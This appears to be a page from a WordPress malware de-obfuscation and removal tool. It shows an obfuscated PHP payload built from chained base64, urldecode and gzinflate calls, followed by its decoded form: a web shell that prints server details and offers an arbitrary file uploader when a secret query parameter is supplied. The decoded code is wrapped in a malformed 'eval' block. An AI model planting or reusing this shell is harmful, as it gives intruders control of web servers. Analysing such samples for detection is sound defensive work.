De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=="; $gzinflate = "xZacupitYPAA/l4Mg25xB9c8e8aKMDZPaWVgcGh+90+ndtLda0vwLWWYN+2YcvHyNa7a8PR6H/IzLPFYaCXT7Twqm1yvdKE6yDBtSjDATIIIxjLEB6kJ7Rw6X5tPLDtUdNhc261UYW21GrryQ/jF/rlbr1MtKqbEcy82idVxQsc929fNtC7mx61G+QbDptBwdq/88zLBpIJ0KpMykcfgUUTJPnP4otVpDvSbQZkS5UYNAOIaSFUJTM7MQJECtdyCAVtQ3omu8MGy8sw4qDD0jzGy28Ou/G7V4Ufzzo1SJIW4sySQZ/zj4AvA21y8TK6j2ZrgSQ5elS7Et25evE2NE3TCVOUaTWUzpp5ofwE6oE9hNMLelpATTpiEUOMoJzdijfyLzx595grETYg6x+yvxjTIyPRbDGltSSZqujJ3AdcR130Jyq/mLgUQu+h+X0HFwI8adFVbcin/rGAVBwJe+DaAfFg/bGAZB4vlBkWA"; eval(htmlspecialchars_decode(urldecode(base64_decode($gz)))); ?> <form action="" method="post"> <input type="text" name="p"> </form>
<?php $gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=="; $gzinflate = "xZacupitYPAA/l4Mg25xB9c8e8aKMDZPaWVgcGh+90+ndtLda0vwLWWYN+2YcvHyNa7a8PR6H/IzLPFYaCXT7Twqm1yvdKE6yDBtSjDATIIIxjLEB6kJ7Rw6X5tPLDtUdNhc261UYW21GrryQ/jF/rlbr1MtKqbEcy82idVxQsc929fNtC7mx61G+QbDptBwdq/88zLBpIJ0KpMykcfgUUTJPnP4otVpDvSbQZkS5UYNAOIaSFUJTM7MQJECtdyCAVtQ3omu8MGy8sw4qDD0jzGy28Ou/G7V4Ufzzo1SJIW4sySQZ/zj4AvA21y8TK6j2ZrgSQ5elS7Et25evE2NE3TCVOUaTWUzpp5ofwE6oE9hNMLelpATTpiEUOMoJzdijfyLzx595grETYg6x+yvxjTIyPRbDGltSSZqujJ3AdcR130Jyq/mLgUQu+h+X0HFwI8adFVbcin/rGAVBwJe+DaAfFg/bGAZB4vlBkWA"; eval { error_reporting(0); @error_reporting(0); @session_start(); if ($_GET["gak"] == "guk") { echo '<b>RevoLutioN Namesis<br><br>' . php_uname() . '<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if ($_POST['_upl'] == "Upload") { if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; } } } }; ?> <form action="" method="post"> <input type="text" name="p"> </form>
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.